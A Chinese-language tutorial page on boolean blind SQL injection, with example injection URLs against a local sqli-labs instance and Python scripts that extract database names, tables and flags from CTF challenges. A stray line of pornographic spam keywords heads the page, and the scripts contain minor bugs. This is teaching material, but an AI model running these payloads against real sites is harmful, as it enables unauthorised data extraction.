欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

python 布爾注入原理及滲透過程示例

 更新時(shí)間:2022年10月18日 11:22:48   作者:XINO  
這篇文章主要介紹了python 布爾注入原理及滲透過程示例,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪

引文

之前有一篇文章給大家?guī)砹薙QL注入的基本知識(shí)點(diǎn)以及分類,包含的面比較廣但是不深入,于是我準(zhǔn)備詳細(xì)講講每一種類型的SQL注入的詳細(xì)利用方法以及場景,今天給大家?guī)淼氖遣紶柮ぷ?,也是比較常用的一種注入方式。

基本知識(shí)

什么是布爾注入?

先了解一下什么是布爾盲注,在平常我們在網(wǎng)頁輸入SQL語句網(wǎng)頁會(huì)給我們關(guān)于SQL語句的回顯,比如SQL錯(cuò)報(bào)信息,我們根據(jù)這些錯(cuò)報(bào)信息去進(jìn)行SQL注入,但你們有沒有想過,如果當(dāng)我們傳入語句網(wǎng)站不會(huì)給我們回顯時(shí),我們該怎么辦呢,這時(shí)我們引入布爾注入的概念,即通過一些判斷語句來確認(rèn)數(shù)據(jù)庫的內(nèi)部信息,可以看看下面的圖:

有回顯

無回顯

下面就告訴大家如何在只有兩種回顯的頁面,利用函數(shù)來實(shí)現(xiàn)我們的布爾盲注。

函數(shù)

下面給大家舉例一下布爾盲注中常用的函數(shù)以及他們的作用:

length(str):返回str字符串的長度。

substr(str, pos, len):將str從pos位置開始截取len長度的字符進(jìn) 行返回。注意這里的pos位置是從1開始的,不是數(shù)組的0開始

mid(str,pos,len):跟上面的一樣,截取字符串

ascii(str):返回字符串str的最左面字符的ASCII代碼值。

ord(str):同上,返回ascii碼

if(a,b,c) :a為條件,a為true,返回b,否則返回c,如if(1>2,1,0),返回0

當(dāng)然這只是最常見的函數(shù),當(dāng)上面這些被禁用時(shí),我們可以尋找其他的函數(shù),下面給大家舉例如何利用這些函數(shù)。

根據(jù)布爾型的規(guī)則,網(wǎng)頁只給我們返回TRUE或者FALSE,那么我們像下面這樣進(jìn)行傳參:

http://127.0.0.1/Less-8/?id=1'and (length(database()))>8 --+

判斷數(shù)據(jù)庫名字長度是否大于8,正確返回TRUE,錯(cuò)誤返回FALSE。

注入過程

假如我們已經(jīng)判斷完數(shù)據(jù)庫的名字長度,接下來就來猜測數(shù)據(jù)庫的第一個(gè)字母是什么:

http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1'and ascii(substr(database(),1,1))>110#

我們可以根據(jù)二分法來進(jìn)行判斷,當(dāng)我們ASCII為110返回為TRUE,111時(shí)為FALSE,我們就可以判斷ASCII碼為110對應(yīng)的字符為數(shù)據(jù)庫的第一個(gè)名稱。關(guān)于ASCII對應(yīng)的值可以參考下面的圖:

同理我們修改匹配的數(shù)據(jù)庫字段來查詢第二個(gè)字符:

substr(database(),2,1)

查詢出數(shù)據(jù)庫的名字為security后我們按順序查詢表名的第一個(gè)字母:

1' and (ascii(substr((select table_name from information_schema.tables
 where table_schema=''security limit 0,1),1,1)))>100 --+

最后得到表名為emails,于是我們查詢字段值的第一個(gè)字母:

1' and (ascii(substr((select column_name from information_schema.columns
 where table_name='emails'),1,1)))>100 --+

最后得到字段值。

大家有沒有發(fā)現(xiàn)如果我們一個(gè)一個(gè)的試時(shí)間成本是不是很大,于是我們可以編寫腳本來自動(dòng)循環(huán)跑出來。下面會(huì)給大家?guī)砝}。

例題

例題一

給了我們一個(gè)搜索框:

我們嘗試輸入后發(fā)現(xiàn),輸入1回顯Hello, glzjin wants a girlfriend,輸入2回顯Do you want to be my girlfriend?,輸入大于2的數(shù)回顯:Error Occured When Fetch Result,而且還會(huì)檢測我們語句過濾了union等關(guān)鍵字,但是沒有過濾(),考慮布爾盲注。嘗試構(gòu)造PAYLOAD:

id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))

回顯正常,可以進(jìn)行SQL注入,我們利用腳本:

import requests
import time
import re
url='http://4f098f39-88d5-4922-afcc-06e3cfa8ac6e.node4.buuoj.cn:81/index.php'
flag = ''
for i in range(1,43):
    max = 127
    min = 0
    for c in range(0,127):
        s = (int)((max+min)/2)
        payload = '0^(ascii(substr((select(flag)from(flag)),'+str(i)+',1))>'+str(s)+')'
        r = requests.post(url,data = {'id':payload})
        time.sleep(0.005)
        if 'Hello, glzjin wants a girlfriend.' in str(r.content):
            min=s
        else:
            max=s
        if((max-min)<=1):
            flag+=chr(max)
            print(flag)
            break

運(yùn)行得到FLAG:

例題二

也是一個(gè)搜索框,我們分別輸入1和1',得到以下回顯:

猜測是布爾注入,我們先查詢數(shù)據(jù)庫長度:

1 and length(database()) >5

得到數(shù)據(jù)庫長度為4后,我們查詢數(shù)據(jù)庫名字:

1 and ascii(substr(database(),1,1))=115

得到庫名為sqli,接下來就是查詢表和字段等操作了,在網(wǎng)上找了一個(gè)腳本來讓他自己跑:

import requests
# 爆庫
def dataBaseName(url, mark):
    name = ''
    for i in range(1, 9):
        for j in "sqcwertyuioplkjhgfdazxvbnm":
            payload = url + "if(substr(database(),%d,1)='%s',1,0)" % (i, j)
            r = requests.get(payload)
            if mark in r.text:
                name = name + j
                print(name)
                break   
    print('數(shù)據(jù)庫名:', name)
# 爆表
def table_name(url,mark):
    tableList = []
    for i in range(0,4):
        name = ''
        for j in range(1,9):
            for k in 'sqcwertyuioplkjhgfdazxvbnm':
                payload = url + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,0)' %(i,j,k)
                r = requests.get(payload)
                if mark in r.text:
                    name = name + k
                    print(name)
                    break
        tableList.append(name)
    print('table_name:',tableList)
# 爆字段
def column_name(url,mark):
    columnList = []
    for i in range(0,3):
        columnName = ''
        for j in range(1,9):
            for k in 'sqcwertyuioplkjhgfdazxvbnm':
                payload = url + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema = database() limit %d,1),%d,1)="%s",1,0)' %(i,j,k)
                r = requests.get(payload)
                if mark in r.text:
                    columnName += k
                    print(columnName)
                    break
        columnList.append(columnName)
    print("字段名:",columnList)
# 爆字段第一個(gè)行內(nèi)容
def get_data(url,mark):
    data = ''
    for i in range(1,50):
        for j in range(48,126):
            payload = url + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,0)' %(i,j)
            r = requests.get(payload)
            if mark in r.text:
                data += chr(j)
                print(data)
                break
    print("字段第一個(gè)值",data)
# 爆字段前10行內(nèi)容
def get_data(url,mark):
    dataList = []
    for i in range(1,10):
        data = ''
        for j in range(1,50):
            for k in range(48,126):
                payload = url + 'if(ASCII(SUBSTR((SELECT flag FROM `flag` limit %d,1),%d,1))=%d,1,0)' %(i,j,k)
                r = requests.get(payload)
                if mark in r.text:
                    data += chr(k)
                    print(data)
                    break
        dataList.append(data)
    print("字段前10行內(nèi)容",dataList)
if __name__ == "__main__":
    url = "/?id="
    mark = "query_success"
    dataBaseName(url, mark)
    table_name(url, mark)
    column_name(url, mark)
    get_data(url,mark)

結(jié)語

今天詳細(xì)講了布爾注入的原理以及滲透過程,有興趣的小伙伴可以自己搭建靶機(jī)嘗試,文章中可能有錯(cuò)誤的的地方歡迎大家指出,更多關(guān)于python 布爾注入滲透的資料請關(guān)注腳本之家其它相關(guān)文章!

相關(guān)文章

  • Python常用基礎(chǔ)模塊之os.path模塊詳解

    Python常用基礎(chǔ)模塊之os.path模塊詳解

    這篇文章主要介紹了Python常用基礎(chǔ)模塊之os.path模塊詳解,os模塊的子模塊os.path 是專門用于進(jìn)行路徑操作的模塊,常用的路徑操作主要有判斷目錄是否存在、創(chuàng)建目錄、刪除目錄和遍歷目錄等,需要的朋友可以參考下
    2023-08-08
  • Python中對象的引用與復(fù)制的使用

    Python中對象的引用與復(fù)制的使用

    引用和復(fù)制是Python處理對象的重要概念,本文主要介紹了Python中對象的引用與復(fù)制的使用,文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧
    2023-12-12
  • python運(yùn)行shell命令subprocess的實(shí)現(xiàn)

    python運(yùn)行shell命令subprocess的實(shí)現(xiàn)

    本文主要介紹了python運(yùn)行shell命令subprocess的實(shí)現(xiàn),文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧
    2023-03-03
  • Python 序列的方法總結(jié)

    Python 序列的方法總結(jié)

    這篇文章主要介紹了Python 序列的方法總結(jié)的相關(guān)資料,需要的朋友可以參考下
    2016-10-10
  • python篩選出兩個(gè)文件中重復(fù)行的方法

    python篩選出兩個(gè)文件中重復(fù)行的方法

    這篇文章主要為大家詳細(xì)介紹了python篩選出兩個(gè)文件中重復(fù)行的方法,具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下
    2018-05-05
  • Python+Turtle繪制航海王草帽路飛詳解

    Python+Turtle繪制航海王草帽路飛詳解

    turtle庫是一個(gè)點(diǎn)線面的簡單圖像庫,在Python2.6之后被引入進(jìn)來,能夠完成一些比較簡單的幾何圖像可視化。本文將利用turtle繪制一個(gè)可愛的草帽路飛,感興趣的可以試一試
    2022-03-03
  • python動(dòng)態(tài)進(jìn)度條的實(shí)現(xiàn)代碼

    python動(dòng)態(tài)進(jìn)度條的實(shí)現(xiàn)代碼

    有時(shí)候我們需要使用print打印工作進(jìn)度,正常使用print函數(shù)會(huì)導(dǎo)致刷屏的現(xiàn)象,本文通過實(shí)例代碼給大家介紹python動(dòng)態(tài)進(jìn)度條的實(shí)現(xiàn)方法,感興趣的朋友跟隨小編一起看看吧
    2019-07-07
  • Python中字符串String的基本內(nèi)置函數(shù)與過濾字符模塊函數(shù)的基本用法

    Python中字符串String的基本內(nèi)置函數(shù)與過濾字符模塊函數(shù)的基本用法

    這篇文章主要介紹了Python中字符串String的基本內(nèi)置函數(shù)與過濾字符模塊函數(shù)的基本用法 ,本文給大家介紹的非常詳細(xì),具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2019-05-05
  • pycharm使用anaconda全過程

    pycharm使用anaconda全過程

    這篇文章主要介紹了pycharm使用anaconda全過程,具有很好的參考價(jià)值,希望對大家有所幫助。如有錯(cuò)誤或未考慮完全的地方,望不吝賜教
    2023-02-02
  • 如何利用python制作時(shí)間戳轉(zhuǎn)換工具詳解

    如何利用python制作時(shí)間戳轉(zhuǎn)換工具詳解

    這篇文章主要給大家介紹了關(guān)于如何利用python制作時(shí)間戳轉(zhuǎn)換工具的相關(guān)資料,文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧
    2018-09-09

最新評論